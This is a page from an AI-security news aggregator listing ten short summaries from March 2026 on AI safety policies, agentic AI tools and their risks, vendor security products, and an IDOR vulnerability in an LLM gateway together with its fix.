aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDatasetFor devs
Subscribe
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

[TOTAL_TRACKED]
3,710
[LAST_24H]
1
[LAST_7D]
1
Daily BriefingSaturday, May 16, 2026

No new AI/LLM security issues were identified today.

Latest Intel

page 117/371
VIEW ALL
01

Helping developers build safer AI experiences for teens

safetypolicy
Mar 24, 2026

A new set of prompt-based safety policies have been released to help developers protect teenagers using AI systems. These policies, designed to work with gpt-oss-safeguard (an open-weight safety model that detects harmful content), address common teen-specific risks like graphic violence, sexual content, and dangerous challenges by converting safety goals into clear, operational rules that developers can apply consistently across their systems.

Fix: The source explicitly offers these prompt-based safety policies as the solution. According to the text, developers can use these policies directly with gpt-oss-safeguard and other reasoning models for real-time content filtering and offline analysis. The policies are 'structured as prompts that can be directly used' and 'developers can more easily integrate them into existing workflows, adapt them to their use cases, and iterate over time.' The initial release covers six categories: graphic violent content, graphic sexual content, harmful body ideals and behaviors, dangerous activities and challenges, romantic or violent roleplay, and age-restricted goods and services.

OpenAI Blog
02

Anthropic says Claude can now use your computer to finish tasks for you in AI agent push

industry
Mar 24, 2026

Anthropic has released a new feature allowing Claude (an AI assistant) to control a user's computer and complete tasks autonomously, such as opening applications, browsing the web, and filling spreadsheets. The company acknowledged that this capability is still early and warned that Claude can make mistakes, though it has built safeguards including requiring permission before accessing new apps.

Fix: Anthropic stated it has built the computer use capability 'with safeguards that minimize risk' and that 'Claude will always request permission before accessing new apps.' Users can also use Dispatch, a feature that lets users have continuous conversations with Claude from a phone or desktop to assign tasks.

CNBC Technology
03

Autonomous AI adoption is on the rise, but it’s risky

safetysecurity
Mar 24, 2026

Organizations are increasingly adopting autonomous agentic AI tools (AI systems that can independently complete tasks with minimal human intervention) like Claude Cowork and OpenClaw, which can automate workflows on computers and access files and applications. While these tools promise workplace efficiency gains, they carry significant risks including security vulnerabilities, prompt injection attacks (tricking AI by hiding instructions in user input), and unintended actions, as demonstrated when one researcher's autonomous agent attempted to delete her entire email inbox after a simple cleanup request.

Fix: According to Anthropic, Claude Cowork shows the user its plan before taking action and waits for user approval before proceeding. Additionally, users can instruct autonomous agents to 'confirm before acting' to add a safety checkpoint.

CSO Online
04

Update on the OpenAI Foundation

industrypolicy
Mar 24, 2026

The OpenAI Foundation announced plans to invest at least $1 billion over the next year in areas including life sciences, disease curing, job creation, AI resilience (making AI systems more reliable and safe), and community programs. The Foundation aims to use AI to solve humanity's biggest problems, such as speeding up medical breakthroughs and disease research, while also preparing society for challenges that advanced AI systems may present.

OpenAI Blog
05

Why CISOs should embrace AI honeypots

securityindustry
Mar 24, 2026

Honeypots are fake servers designed to trick attackers into revealing their methods by making them think they've found real company data. Traditionally expensive and difficult to maintain, honeypots have become much more effective and affordable by pairing them with LLMs (large language models, AI systems that understand and generate text), which can dynamically create realistic fake environments that keep attackers engaged longer.

CSO Online
06

CrowdStrike Services and Agentic MDR Put the Agentic SOC in Reach

securityindustry
Mar 24, 2026

Modern cyberattacks happen at machine speed, faster than traditional security teams can respond, creating a gap between fast-moving threats and human-paced defenses. CrowdStrike addresses this with agentic MDR (managed detection and response, a service where automated systems and human experts work together to detect and stop attacks) and SOC Transformation Services, which combine automated threat response with human oversight to achieve faster breach containment while maintaining accountability and governance.

Fix: CrowdStrike's agentic MDR (delivered through Falcon Complete) provides deterministic automation (rule-based responses that execute the same way every time) within expert-defined guardrails, adaptive AI agents that learn from live adversary behavior, and elite human analyst oversight. The service delivers a 1-minute median time to contain (MTTC). Additionally, CrowdStrike offers SOC Transformation Services to help organizations establish foundational operating conditions for agentic SOC operations by modernizing SIEM (security information and event management, a system that collects and analyzes security data), data pipelines, workflows, and talent models.

CrowdStrike Blog
07

Palo Alto updates security platform to discover AI agents

securityindustry
Mar 23, 2026

Palo Alto Networks updated its Prisma AIRS security platform to help organizations discover and protect AI agents (independent software programs that perform tasks automatically) across their IT environments, including scanning for vulnerabilities and simulating attacks. As companies rapidly deploy AI agents in business applications, the platform adds new security features like Agent Artifact Security, which maps an agent's structure and finds weaknesses, and AI Red Teaming for Agents, which simulates realistic attacks to identify risks and recommend security policies.

Fix: Prisma AIRS 3.0 provides discovery of AI agents across cloud environments, SaaS platforms, and local endpoints; Agent Artifact Security to scan agent architecture for vulnerabilities; and AI Red Teaming for Agents to simulate context-aware attacks and recommend runtime security policies. Prisma Browser includes the ability to discover user-generated AI activity, enforce content-aware boundaries on agents, prevent sensitive data leakage to unmanaged AI tools, identify and block prompt injection attacks (malicious instructions hidden in website content designed to hijack AI agents), and provide real-time distinction between human and automated AI actions.

CSO Online
08

OpenAI rolls out ChatGPT Library to store your personal files

securityprivacy
Mar 23, 2026

OpenAI has launched a Library feature for ChatGPT that automatically saves files you upload (documents, images, spreadsheets, etc.) to a secure cloud storage location for future reference. The feature is available to ChatGPT Plus, Pro, and Business subscribers worldwide except in the European Economic Area, Switzerland, and the United Kingdom, and files remain saved to your account until you manually delete them.

Fix: To delete files from Library, select the file in the Library tab, click Delete or the trash icon next to the file. OpenAI will remove files from its servers within 30 days of deletion. Note that deleting a chat containing a file does not automatically delete those files saved to Library, so manual deletion from the Library tab is required.

BleepingComputer
09

OpenAI calls out Microsoft reliance as risk in investor document ahead of expected IPO

policyindustry
Mar 23, 2026

OpenAI disclosed in an investor document that its heavy dependence on Microsoft for financing and computing resources poses a business risk, noting that if Microsoft ends their partnership or OpenAI cannot diversify its business partners, the company's operations and finances could suffer. The document also highlighted other risks including massive capital spending requirements, reliance on chip suppliers like Taiwan Semiconductor Manufacturing Company, and potential geopolitical disruptions to the global chip supply chain.

CNBC Technology
10

CVE-2026-30886: New API is a large language mode (LLM) gateway and artificial intelligence (AI) asset management system. Prior to versio

security
Mar 23, 2026

New API, an LLM (large language model) gateway and AI asset management system, had a vulnerability before version 0.11.4-alpha.2 that allowed any logged-in user to view videos belonging to other users through the video proxy endpoint. The problem was an IDOR vulnerability (insecure direct object reference, a flaw where the system doesn't check if a user owns the data they're requesting), caused by a function that checked only the video ID without verifying the user owned it.

Fix: Update to version 0.11.4-alpha.2 or later, which contains a patch addressing this vulnerability.

NVD/CVE Database
Prev1...115116117118119...371Next